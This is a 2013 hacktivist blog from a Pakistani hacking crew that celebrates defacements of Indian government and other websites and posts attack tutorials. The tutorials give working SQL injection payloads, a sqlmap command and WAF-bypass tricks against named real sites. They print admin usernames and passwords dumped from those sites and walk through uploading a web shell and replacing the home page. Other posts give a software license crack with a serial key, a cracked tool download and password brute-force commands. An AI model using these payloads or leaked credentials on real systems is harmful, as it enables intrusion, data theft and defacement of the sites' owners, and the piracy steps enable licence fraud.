Saturday, 16 November 2013

Consulate General Of India,New York USA Website Hacked

No comments :

Well Another Down it looks like Pakistani Hacker's are on there peak they have started some sort of Op against higher authorities of India whom aren't Innocent "THEY" think,
This time Consulate general of India In New York, USA official website boxed by Pak Cyber Experts Muhammad Bilal who is very active in hacking .in domains and another hacker going with the hack handle Ch3rn0by1 from Pak Mad Hunters.

The reason behind the hack is to support Kashmir,hackers in there deface page wrote 
"Free Kashmir Freedom is our Goal"

Screenshot of the page injected by Hackers


The link of the hacked site : http://www.indiacgny.org/index.html
The hacker made mirror of the hacked site on : zone-hc
Read More

Indian Embassy Austria To Montenegro Website Hacked

No comments :

Recently a "Hacker" going with the hack handle "Connecting Friend" defaced the Official Website of "India Embassy Austria To Montenegro"
The Reason behind the hack "Is" to record a protest Against Indian Governement for what they are doing in Kashimir and according to the deface page the hacker injected also mentioned that "PAKISTAN ZINDABAD AND STOP KILLING OF INNOCENT KASHMIRIS" the hacker also mentioned following lines in his deface code. 

"We condemn presence of RAW in Balochistan. And Condemn Indian firing in the Sialkot sector on October 21. "

Below is a screenshot of the hacked website :




The hacker made mirror of hacked site http://www.indianembassy.at/ on Zone-hc
The same hacker have been successfully defaced the Official Websites Of Suzuki Brunei And Laxmi Hyundai in past.


Read More

Friday, 15 November 2013

SQL Injecting In A Website Using Sqlmap In Post Parameter's

3 comments :

Hello Friends :D

Its been a long time since I post :P so here come's a new tut :D
Well We have seen many Injectors whom are hacking websites/servers using a Technique Called SQLi ( Structured Query Language Injection ) manually or by the help of some tools :D
so I thought to make a TUT on How to Inject A Website with Sqlmap Onto A "POST" Parameter :P
Yup not in GET parameter :D
so Let's Start :D

Requirements :

1) FIREFOX
3) BASIC KNOWLEDGE OF SQLi

First of all Find a target which is using a VULNERABLE form so that we can Inject it with the help of SQL map :D so in my Case I have my one :P


Now let's check whether our web based form is vulnerable to SQLi or not? Open your firefox Browser and press F9 key to enable the hackbar and also enable post data like this :



After doing that post something in the Roll Number field to get the POST Parameters well I have a Valid Roll Number (111111) Of A Student xD so lets post it and check what we got and afte clicking the submit Button load the url Again with the help of Hackbar so that It will show you the POST parameters like this :D


Good Going Now lets add a Single Quote ( ' ) in post parameter field which is "rollno=111111" lets seee what we get :?


So its Vulnerable :D now let's do some SQLmap Kung FU :D open up your Sqlmap and use this command :D

python sqlmap.py -u "http://delhiboard.org/10thresult.do" --data "rollno=111111&s_result=Submit" --dbs

SQLmap will directly start to Inject the post parameter which you have provided :D


Voila We have the DB's :D so now inject the website with the default commands ;) hopes you like my simple tut if you are facing any problem or want any sorf of help regarding TUT just drop a comment below hopes you like it :)

WELLLL WAIIT 1 MORE THING "YOU CAN INJECT THE WEBSITE MANUALLY ASWELL xD" 

Babye

Read More

Thursday, 27 June 2013

Big Server Rooted By Dr Trojan Aka H4x0rL1f3

No comments :

A Pakistani Hacker known by Hack Handle "H4x0rL1f3" Also known by another hack handle "Dr Trojan" rooted a very big server which contains Indian's websites which contains gov.in that mass defacement is very big that in a status post of his he told his followers that he's getting "Internal Server Error" while submitting the mirrors on Zone-h.com well afterwards he was successfully able to made all mirrors of his hacks.
Well the hacker which rooted the server was not visible in hacking field for a while some says that he leaved H4x0ring but the last night he was successfully able to peneterate the server and rooted it
it contains about 9000+ websites.

The message in the deface page by the hacker was simple he was just saying that "He is Back"

The mirrors were submitted on Zone h

Mirrors

The list of websites which was hacked are available in the link below.

Websites which was hacked

Well now the whole world knows that Pakistani Hackers are not lefted behind in hacking field they are still here was sleeping but not dead so expect them :)

Read More

Wednesday, 26 June 2013

PakBugs Pawn'd

No comments :

A Pakistani Hacker knows by hack handle "1337" well known for hacking many high profile domains like google of different countries.
Well another well known pakistani hacker crew which are also well known but caged in a controversy that the leader of PakBugs which is Zombie_Ksa a well known hacker is faked means someone faking Zombie_Ksa and running the shop of fake pakbugs but,
1337 is successfully able to pawn in there CC shops website (Black Market)
The Domain which was hacked by the hacker is

http://www.pakbugs.com/pakbugs-official-credit-card-sellng-shop/

http://cvvshop.ac/

The message given in the deface page was of exposion a crew member of PakBugs name Xploiter the hacker exposed his real identity which contains his phone number,personal picture and his real name
well this group was be as like bullet proof but that pakistani hacker has a hell a lot of skills :)

The mirrors of the hacked website are submitted on zone-h the original archive of hacktivism.
Mirrors are as follows

http://zone-h.net/mirror/id/20153170

http://zone-h.net/mirror/id/20153167

feel free to comment below. :)
Read More

Sunday, 9 June 2013

Another Attack On Indian Website's

No comments :

A Pakistani Hacker's Crew Namely "P4K-M4D-HUNT3R-Z" recently attack on Indian websites this team is well known for attacking on Indian website's,
Recently A hacker from this Crew knows with hack handle "Ch3rn0by1" attacks on Indian website the message was quite simple that they are taking revenge of abusing there religion,
Well bit before Indian hackers targeted Pakistani's domains and abuses there religion in there deface.

 Well the message which was shown on the deface page is as follows :

"Welcome back Admin,your site got hacked!!!,Server Boxed :D,Indian lammer's never abuse our religion!!! I was testing your site security!!! now may be you know how secure it is :D,Well it was not enough to stop me :D,Hasta La Vista Babies :D ,GOTO HELL SECURE YOUR SITE"

 The website which are successfully penetrated by the hacker contains the following domain's

 DOMAINS :
 
1) http://hansum.in/
2) http://samwebstudio.co.in/
3) http://indiaeduspring.com/
4) http://christopher-fong.com/
5) http://travhawk.com/
6)  http://www.saban.in/

 

MIRRORS :

 

The hacker made mirrors of hacked website on Zone-h which is the most popular archive of Hacktivism,

1) http://www.zone-h.org/mirror/id/19991935
2) http://www.zone-h.org/mirror/id/19991936
3) http://www.zone-h.org/mirror/id/19991937
4) http://www.zone-h.org/mirror/id/19991938
5) http://www.zone-h.org/mirror/id/19991939
6) http://www.zone-h.org/mirror/id/19991940


Read More

Monday, 20 May 2013

How to bypass WAF ( Web Application Firewall ) in SQL injection.

No comments :
Hi friends,
hopes you all are fine well,I have seen many peoples face 404 forbidden difficulties when they try to inject a website which have some good WAF's through sql injection so I was thinking to share a tutorial with you peoples which is written by my friend :P P4K M4D HUNT3R-Z St!k3r this tutorial is based on that how you can remember the word "can" bypass or get an idea that how to bypass waf 404 forbidden in sql injection well this tutorial is noob friendly and hopes you have some basic knowledge about SQL injection attack method if not then read it first CLICK HERE.
so let's start..
we have our target which has waf so we will try to bypass it and get the admin username and pass :D

http://www.gogame.co.in/news.php?id=189

so now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !

http://www.gogame.co.in/news.php?id=189'

nothing change ?

try to add before number
http://www.gogame.co.in/news.php?id=%27189

if still nothing happened to page the leave the site and move to next site !

but luckly i dont need to move to next site this site is vulnerable

http://www.gogame.co.in/news.php?id=189'

by adding this ' the result of page changed !
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by post DESC' at line 1

now you can see this msg on page !

mean this site can be hack !

------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !

http://scan.subhashdasyam.com/admin-panel-finder.php

now we will paste the site link there
which is http://www.gogame.co.in/
and click on dump!

it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.gogame.co.in/admin/ is in green color rest of all are red !
mean http://www.gogame.co.in/admin/ is the admin panel of this website !
now open this page

it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.gogame.co.in/news.php?id=189'
this section again ! now write
http://www.gogame.co.in/news.php?id=189 order by 1--+-
the page remain same ?
http://www.gogame.co.in/news.php?id=189' order by 2--+-
same ?
continue this untill the error display on page !
http://www.gogame.co.in/news.php?id=189' order by 4--+-
same!
http://www.area96.it/news.php?nws=61' order by 5--+-
unknown columns

mean there is no 5 column in this !
so there are 4 column !

we got the column we will find the vulnerbale column now !
write

http://www.gogame.co.in/news.php?id=-189 union select 1,2,3,4--+-
ops 403 forbidden !
mod security :P
now we will bypass this shit
acually words are forbidden like select !
when u hit enter it has to go through firewall and select is forbidden so it will denied the command
so we have to trick it by using our brain
in database / * ! ` ~ ( ) these kind of symbol are not supported !
so when we if we add an extra sybol with select firewall will allow it ! so we can trick it !

http://www.gogame.co.in/news.php?id=-189 union /*!select*/ 1,2,3,4--
bypassed :P

now u can see 2 3 4 at the page as vuln columns !

these three numbers are displayed on the page !

mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !

now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.gogame.co.in/news.php?id=189 union select 1,group_concat(table_name),3,4--+-

and after 6 add "from Information_schema.tables"
like this

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat(table_name),3,4 from Information_schema.tables--+-

now enter
ops
again 403 forbidden !
we need to trick some more words !

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,group_concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-

function group_concat does not exist O_o
it seam like group_concat is not working so we will use only concat now

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-

bypassed

now instead of number 2 column it will show tables name ! like this one

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET

this mean it showing us the table name !
but we need user name and password which is located in the database of website

so we will use

database also to extract username and password !

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables--+-

just add 1 more line after information_schema.tables

which is "where table_schema=database()"
like this

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(table_name)*/,3,4 from Information_schema/**/.tables where table_schema=database()--+-

now on the page !
it showing the database's tables !

Adminlogin

these are tables

now we will send the query to open adminlogin table !

change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"

but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !

for this you can use this site !

http://www.branah.com/ascii-converter

from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
97 100 109 105 110 108 111 103 105 110
now change it to
CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where table_name=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-

ops again 403
table_name is forbidden
bypass

http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(column_name)*/,3,4 from Information_schema/**/.columns where /*!table_name*/=CHAR(97, 100, 109, 105, 110, 108, 111, 103, 105, 110)--+-
the page show the result

usnd pdgame

this mean these are the columns of table adminlogin

now we will simply send the query to give us the username and password on the page !

just change
"(column_name)" to "(usnd,0x3a,pdgame)"
and after "from" remove all words and add "adminlogin"

0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.gogame.co.in/news.php?id=189 union /*!select*/ 1,concat/*!(usnd,0x3a,pdgame)*/,3,4 from admin--+-

the page show this result

kolgo:gamekol

mean
1st user is
username=kolgo
password=gamekol

now we have the password we will move to admin panel to hack website

IMPORTANT NOTE :

well this tutorial is only for education purpose we are not responsible on that how you use this.....be aware

don't forget to comment ;)
Read More

Thursday, 9 May 2013

Registering IDM without any patch or crack.

3 comments :

Hello friends hopes you all are fine :D
today i was thinking to share a trick with you people's which is written by my friend madCodE in this trick we are going to register IDM which is one of the best download manager out there :D
to full version without using a crack or patch !! interesting naah :D
So let's start

1) first of all… if you have any antivirus, deactivate it because we are going to edit c:/windows/system32/drivers/etc/hosts file

2) right click on it and select security tab
now press edit button and in users option .. select full control option and save it

3) now double click on hosts file , it will ask how to open file? use notepad to open it

4) now paste these links in hosts file and save it
127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com

5) now open idm > registration >
    first name = Haxor
    last name = Kakka
    email = haxor.py@facebook.com
    serial = GZLJY-X50S3-0S20D-NFRF9

And hit enter :D voila you have registered the IDM without any patch or crack :D
enjoy ;)
Read More

Sqli Hacking + Noob Friendly Tutorial

2 comments :

A tutorial By one of my best friend this tutorial will guide you that how you can use sqli vulnerability to hack a target :D noob friendly tut :D
Like Str!k3r official team Page.
So let's start,



1) A TUTORIAL ON HACKING A WEBSITE THROUGH SQL INJECTION

2) UPLOADING SHELL

3) DEFACE/HACK IT
-------------------------------------------------------------------------------------------------
1st step find a sql vulnerable site !
for finding a site to hack u will need google.com
we will use google dork to find sites
dork will be INURL:
the task of this dork iss to find the giving words in URL ADDRESSES
so it will find the giving words in website's url address bar
goto google.com

type this
inurl:news.php?nws=
this search will show the sites having the page of news.php?nws=

now you got so many result at page !
now open 1st site
like mine is http://www.area96.it/news.php?nws=61
now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !

http://www.area96.it/news.php?nws=61'

nothing change ?

try to add before number
http://www.area96.it/news.php?nws=%2761

still nothing happened ?

http://www.area96.it/news.php?nws"61

if still nothing happened to page the leave the site and move to next site !

but luckly i dont need to move to next site this site is vulnerable

http://www.area96.it/news.php?nws=61'

by adding this ' the result of page changed !

now you can see this msg on page !

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38

mean this site can be hack !

------------------------------------------------------------------------------------------------
step 2 :
finding admin panel !
now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !

http://scan.subhashdasyam.com/admin-panel-finder.php

now we will paste the site link there
which is http://www.area96.it/
and click on dump!

it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.area96.it/admin/index.php is in green color rest of all are red !
mean http://www.area96.it/admin/index.php is the admin panel of this website !
now open this page
http://www.area96.it/admin/index.php
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------
step 3 :
now we need the username and password to login so we sill use
http://www.area96.it/news.php?nws=61'
this section again ! now write
http://www.area96.it/news.php?nws=61' order by 1--+-
the page remain same ?
http://www.area96.it/news.php?nws=61' order by 2--+-
same ?
continue this untill the error display on page !
http://www.area96.it/news.php?nws=61' order by 6--+-
same!
http://www.area96.it/news.php?nws=61' order by 7--+-
error Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38

mean there is no 7 column in this !
so there are 6 column !

we got the column we will find the vulnerbale column now !
write

http://www.area96.it/news.php?nws=61' union select 1,2,3,4,5,6--+-
still the same ?
add - sign before the number!
http://www.area96.it/news.php?nws=-61' union select 1,2,3,4,5,6--+-

now
2
1
6

these three numbers are displayed on the page !

mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !

now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6--+-

and after 6 add "from Information_schema.tables"
like this

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-

now enter

now instead of number 2 column it will show tables name ! like this one

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET

this mean it showing us the table name !
but we need user name and password which is located in the database of website

so we will use

database also to extract username and password !

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-

just add 1 more line after information_schema.tables

which is "where table_schema=database()"
like this

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables where table_schema=database()--+-

now on the page !
it showing the database's tables !

accessi,chi_siamo,friends,friends_canzoni,friends_cd,friends_photo,friends_video,login,mostre,mostre_photo,news,prodotti,titoli_canzone,

these are tables

now we need to guess which table can contain username and password information !
i guess "login"
so we will see login table 1st !

now we will send the query to open login table !

change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"

but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !

for this you can use this site !

http://www.branah.com/ascii-converter

from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
108 111 103 105 110
now change it to
CHAR(108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(column_name),3,4,5,6 from Information_schema.column where table_name=CHAR(108, 111, 103, 105, 110)--+-

the page show the result

id_login,username,password,email,admin,abilitato,id_friends

this mean these are the columns of table "login"
we need only username and password to login at admin panel so
now we will simply send the query to give us the username and password on the page !

just change
"(column_name)" to "(username,0x3a,password)"
and after "from" remove all words and add "login"

0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(username,0x3a,password) from Login--

the page show this result

davide:cippalippa,curvedair:oblivion,lorenzo01:bertocchini01,andrea01:braido01,mauro01:aimetti01,jjjedizionimusicali:joesjoint,renato01:franchi0

mean
1st user is
username=davide
password=cippalippa
2nd user is
username=curvedair
password=oblivion

etc
now we have the password we will move to admin panel to hack website-----
-------------------------------------------------------------------------------------------------
step 4:
goto
http://www.area96.it/admin/index.php
and login with the username and password u just got !
username=davide
password=cippalippa

logged in successfully !

now you have access to change website products news etc ......

but to take fully control we need to upload shell in the webstie !

shell: shell is a kind of control panel which give you access to do whatever you want in the site !
shell is scripted in that way to give access you to do whatever u want to do with the hardrive of website !

there are so many shell available but i will use and recommand u to use
MADSPOTSHELL
its a 1st pakistani and the world best shell !

you can download it from here

http://www.mediafire.com/?8b6dmgdo7edkus2

now find any area from where u can upload this shell like
add image add product etc

i have an option here for add news !
and it give me option of adding image of news !

i will try to upload madspotshell.php from image upload section !

just enter the news it will ask for image select madspotshell.php instead of any image !
upload successfully !

now just find the shell location!

normally it show an error icon on the image !
right click on error icon select copy image url/copy image location
and paste it to the url address like mine is

http://www.area96.it/images/news/1352954638mad.php

hit enter !

shell opened !
now you can remove add edit anyfile from here !

-------------------------------------------------------------------------------------------------
last step :

now u are in shell !

u need to hack this site !

the site default page is index
when ever you open a site like the target site is
http://www.area96.it/
it run on http://www.area96.it/index.php

so you will need to change the index.php file

in the shell u are in the directory where shell is uploaded !

like i uploaded ma shell from image section so it is in
http://www.area96.it/images/news/

at the low top
u can see this

PWD: /home/area96/area96.it/images/news/ |CURRENT|

which is showing ure current directory

u need to edit index.php which is located at area96.it

so click on area96.it from
PWD: /home/area96/area96.it/images/news/ |CURRENT|
this line

it will open the PWD: /home/area96/area96.it/ |CURRENT|
directory !

now at the center u can see the files located in the folder !

also index.php

just rename ure deface page to index.php and upload it here !

it will over write the file and when someone open the site it will show your deface page at the site instead the site !

upload button is at the botton of the shell !

just replace ure index.php to /home/area96/area96.it/ |CURRENT

and the site is hacked!
now open the website and see ure name is there or not !

http://www.area96.it/

Hacked BY Str!k3r !

----------------------------------------------------------------------------------------------
NOTE : this post is just to share the knowledge and and for education purpose only the No1 Will be responsible if you do something stupidly and get caught by cops !
try at your own risk
-----------------------------------------------------------------------------------------------
Read More

Installing Google Chromium Browser In Backtrack 5

3 comments :
Well friends,
Today we will see that how to install Google Chromium Browser in Backtrack 5,
So as we know that Google Chrome is one of the best browser ever made,Google also made a chrome like flavour for linux OS which called Chromium Browser
it has many features and most safe browser ever,

well Chrome can be installed on Windows without any problem :D but the situation get worse when a hacker or a pentester or a linux distros lover's tries to install it on Backtrack or other distros.
So let's start step by step that how to install Chromium on a distro which is in my case Backtrack 5 R3
So let's do it ;)

1) first of all open terminal and download Google Chromium archive by this command.

root@bt:~# apt-get install chromium-browser

2) After completion of download you can see Chromium on Application=>Internet=>Chromium Web Browser so let's open it ^_^


Well that's the main problem we actually get :D so how to solve this it's easy
open terminal and type

root@bt:~# cd /usr/lib/chromium-browser

3) Now type

root@bt:/usr/lib/chromium-browser# hexedit chromium-browser

something like this will be popup on the terminal



Don't worry now we just need to change the value of a specific id. :D

4) Now the most important step Press the tab button and then ctrl+s to be in the search mode then type "geteuid" and replace it with "getppid" and don't hit enter -_- press ctrl+x and it will prompt you to save changes or not just press "Y"

Voila now open the Chromium and check if it's opening or not :D

Enjoy your Chrome browser on Backtrack :D
Don't forget to comment or giving us your feedback if you have any problem regarding the tut just drop a comment below.

Thank you.

Read More

Wednesday, 8 May 2013

India On PCE Mercy.

No comments :
Recently a Pakistani hacker's team namely Pak Cyber Experts attack indian website's the real reason behind those hacks are mentioned by attacker's.


The attacker's namely x33k A.K.A v1ruX 4u AND X3R03x who attack the websites mentioned the following reason :

MESSAGE :

"=====================================================================                                                                                                                                                  
                            x33k & X3R03X Has Arrived
 You Just Got Hacked Patch Your Asses, Don't Know How To Secure Shits And Making  Sites LOL,
 Huh ! Now Next Time Keep Eye On Your cPanel | Domain | Your Admin Panel Becuase  We Can Get In Again, Take Care
===================================================================================="

The websites which was hacked contains,

1)  http://47webstudio.com/
2)  http://www.brandvois.com/
3)  http://cheatedon.me/
4)  http://www.codyscopywriters.com/
5)  http://dvonn.com/
6)  http://kindlecrush.com/
7)  http://n-frames.com/
8)  http://sandeepgr.tk/
9)  http://www.thewings.co/
10) http://tonyvarghese.com/
11) http://intire.in/


You can find the mirror's on Hack-db.
Read More

Tuesday, 7 May 2013

Uniscan Vuln Scanner

No comments :
Uniscan is a web vulnerability scanner written in perl language,it comes with a variety of scanning techniques.
It is mostly used by black hat means hacker's because its very easy in usage and any can be familiar with it in just a minute it comes built in Backtrack 5 the most linux distro by security pentesters :D

it has many options like,

-h ( for help )
-u ( for confirming a target like -u www.target.com )
-b ( Order uniscan to go background when the scanning will start )
-q ( For Enable Directory Checks )

etc etc.. all options you can see in the picture above :D
now if you want to run it on backtrack just open terminal and type

root@bt:/ cd /pentest/web/uniscan

And hit enter now comes to the main part how to scan a target well its quite simple you have to use just use 1 main option which is -u which defines our target :D and some options according to your need like what you want to be check in the website like this

root@bt:/ ./uniscan.pl -u www.target.com -bqdw  OR
root@bt:/ perl uniscan.pl -u www.target.com -bqdw

Change -bqdw according to your scanning that what you want to be check :D

Well now if you are on windows and don't want to change your os on Linux ( Backtrack ),
Just install perl on your Windows and download the tar.gz file on your computer and run it through perl console its very easy naah :D
                                                         ActivePerl x86 ( for 32 bit )
And
                                                         ActivePerl x64 ( for 64 bit )

Then download the Uniscan 6.2
And enjoy.

hopes you like it don't forget to comment or giving your feedback :D



Read More

#OpUSA Anonghost Target USA

No comments :

A Muslim Cyber Team attack USA websites and started there opUSA recently more over 50+ webs hacked by Anon Ghost,
The website which was recently hacked by AnonGhost Contains

http://www.dawsonmoving.com.au
http://www.hack-db.com/407902.html

http://www,daycareshare.com.au
http://www.hack-db.com/407935.html

http://www.addisfilmfestival.org/
http://www.hack-db.com/407947.html

http://www.vietwebhostings.com/
http://www.hack-db.com/407968.html


MESSAGE :

The message given by the attacker in the deface page are as follow :

"It's time for you to wake up America. You have been sleeping for far too long.You feel it prickling under your skin, you sense it deep in your gut.Change is coming, whether you like it or not. So, either you stand up to the corruption that is your government, or you continue to live as hollow robotic shells, doing the same things day in and day out,expecting different results;While your rights are endlessly stripped away and a dictatorship and militarypolice state rises....what will you do?This defines insanity, does it not?Your silence is not saving anyone, you government has failed you.The only system you have ever known is crumbling and they are desperately trying every crooked avenue to control their messes and to control you MORE, at any cost.Deep down you know these things. You see things things.Will you remain silent? While the world is dying at the hands of the corrupt?Do the atrocities need to be in your own backyards before you act and use your voices?Will you wait until the very last minute before you step outside of your comfort zone and actually do something about it? What are you willing to risk? What lengths are youwilling to go to for TRUE freedom from a parasitical government?Do not wait until the last moments, regretting what you didn't do when it really mattered.The time is now. Wake Up. The way things are going, doom is inevitable.If you want something different, then do something different.AnonGhost is going to be an alarm clock to the United States Government. Please, citizens of the United States of America, do not push snooze anymore.It's time to wake up....wake up....wake up."

Read More

Monday, 6 May 2013

Joomla Vulnerability Scanner.

No comments :

Joomscan is a joomla web vulnerability scanner written in perl langauge for penetrate or finding vulnerability known already in a particular targets,Joomla is the most widely used CMS present now because of its flexibility and plugins which makes easier for webmasters to manage there websites in a friendly use interface
well joomscan comes built in Backtrack 5 just open terminal and type
root@bt~$ cd pentest/web/joomscan

or if you are on windows just installed perl in your windows and open it with perl console :D its easy nahh!!

DOWNLOAD :

                                                                       JoomScan

INTERFACE :


USAGE :

its usage is very very simple like a piece of cake

1) First update your joomscan to the latest vulnerability bundlers by this command
root@bt~$ ./joomscan.pl update or perl joomscan.pl update

2) Now scanning for vulnerabilities on a joomla based website
root@bt~$ ./joomscan.pl -u www.example.com

it will scan the whole plugins installed in the target for exploits :D
now i am 100% sure that you are feeling like I CAN HACK JOOMLA [[Bitch Please]] xD

Don't forget to comment or having any problem regarding the tut just let me know drop a comment below ;)
Read More

WordPress Vulnerability Scanner.

No comments :

WPScan is a WordPress vulnerability scanner which has different flavours of exploiting wordpress based websites it is programmed in RUBY language,it can attack a wordpress website in variety of ways
like you can use non-intrusive scan you can also bruteforce the admin passwords with it if you have a good password list but don't worry there is a built it pass list in backtrack ;)
The best part of the wpscan is that you can enumerate or try to find exploit of plugins installed in it thats the best part of wpscan because exploiting wordpress directly is "hell of a job" thats why the better option is to use plugins enumeration.

INTERFACE :

DOWNLOAD :

                                                                  WPScan Tarball

WPSCAN USAGE :


Do 'non-intrusive' checks...
ruby wpscan.rb --url www.example.com
Do wordlist password brute force on enumerated users using 50 threads...
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
Do wordlist password brute force on the 'admin' username only...
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
Enumerate installed plugins...
ruby wpscan.rb --url www.example.com --enumerate p
Run all enumeration tools...
ruby wpscan.rb --url www.example.com --enumerate
Update WPScan...
ruby wpscan.rb --update
Hopes you like it :D
Read More

Nikto2 Vuln Scanner

No comments :

Nikto is an open source web or server vulnerability scanners widely used in pentesting or by hacker's it is also used by webmaster's to penetrate and find the vulnerabilities in there server which can be exploit with manually or by software's,Nikto scans 6500 potentially dangerous files/CGIs,and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is written by Chris Sullo and David Lodge.


INTERFACE :


so download it to your distro and open it through the terminal

Download anyone from them Nikto2.tar.bz2 or Nikto2.tar.gz.

Now lets come to the main part of the post which is how to use Nikto?
well Nikto can be used is different ways so lets discuss about there usage.

1) The basic use means if you want to scan a ip or a particular target (website)

root@bt:~$ ./nikto.pl -h [target or web url] or perl nikto.pl -h [target or web url]

2) For help if you want to see its more function

root@bt~$ ./nikto.pl -H or perl nikto.pl -H

3) For checking updates just use

root@bt~$ ./nikto.pl -update or perl nikto.pl -update

4) For scanning your target using proxy use command mentioned below

root@bt~$ ./nikto.pl -h [target or web url] -useproxy http://localhost:8080/

./exit

Hopes u like it don't forget to comment ;) if you are facing any prob just drop a comment below :D
Read More

Havij 1.15 Pro

No comments :

Havij is an automated sql injector tools which was made my itsec team it is mostly used automated injector in windows operating system.
Havij has a very friendly interface any one can addict to it but it is a bit slow if your target has some goods waf ( web appliction firewall ) so the chances are 40% by havij that you can inject it with havij,
But in the beginning stage I prefer you to use havij if you are not familiar with manual sql injection.

INTERFACE : 


To get the pro version just read the instruction given in the rar archive and registered your havij copy to pro version in just simple 5 steps..

                                                       MediaFire Download Link

Password : pakmadhunters

Don't forget to comment or giving your precious feedback :)
Read More

Monday, 29 April 2013

Metasploit Attack On Lan ( Windows Xp )

No comments :
Hi friends,
Today i was thinking to share a video tut which is also made by my Friend Expl( )it3r-Z
So,
In this tutorial he demonstrated that how to attack a machine which is on LAN running windows Xp
it is a detailed tutorial so don't miss a second of it,


THINGS USED :

1) Metasploit
2) A virtual machine ( which is windows xp )
3) A brain ^_^

IMPORTANT NOTE :

It is only for educational purpose we are not responsible what you do with this knowledge   and what harm will be affected to others through it
And hacking is a crime so be patient.

If you are facing any difficulty or any prob regarding tutorial comment below and gives us your precious feedback..
Hopes you people's love it.
Read More

Friday, 26 April 2013

Installing Joomla On LocalHost.

No comments :
Hello Friends..
I see many peoples whom are having some problems in installing Joomla on localhost using Wamp server on localhost.
So,
I thought to make a video tutorial on it.
In this video,I have used wamp server and then just following simple steps you can create your own Joomla lab ( For Penetration or To look up that how Joomla's Core works ).

Things Required :

1) Wamp Server ( Download according to your need )

2) Joomla 2.5 ( unzip it on your desktop if you want to download other version of Joomla Click Here download according to your flavour )

3) A Brain.

YouTube



Or you can watch it on,

vimeo


from Ch3rn0by1 on Vimeo.

Hope's you will like it,

Don't forget to comment and giving your feedback.


Read More

Thursday, 25 April 2013

Metasploit Over Internet.

No comments :
Hi Friends,

Today i am sharing a very usefull video tutorial for penetration tester,
Using Metasploit over internet ( WAN ) this video was made by My Friend Zahid Adeel Aka Expl( )it3r-Z
In this video he demonstrated that how to attack a machine on wan by setting up our own server and then sending the address of our server to the victim.

   Thing's Needed :
1) Backtrack.
If you are on windows then download Metasploit.
2) Port Forwards
3) A Brain ( Most Important )



Feel free to comment and give us your feedback and also like our page PMH

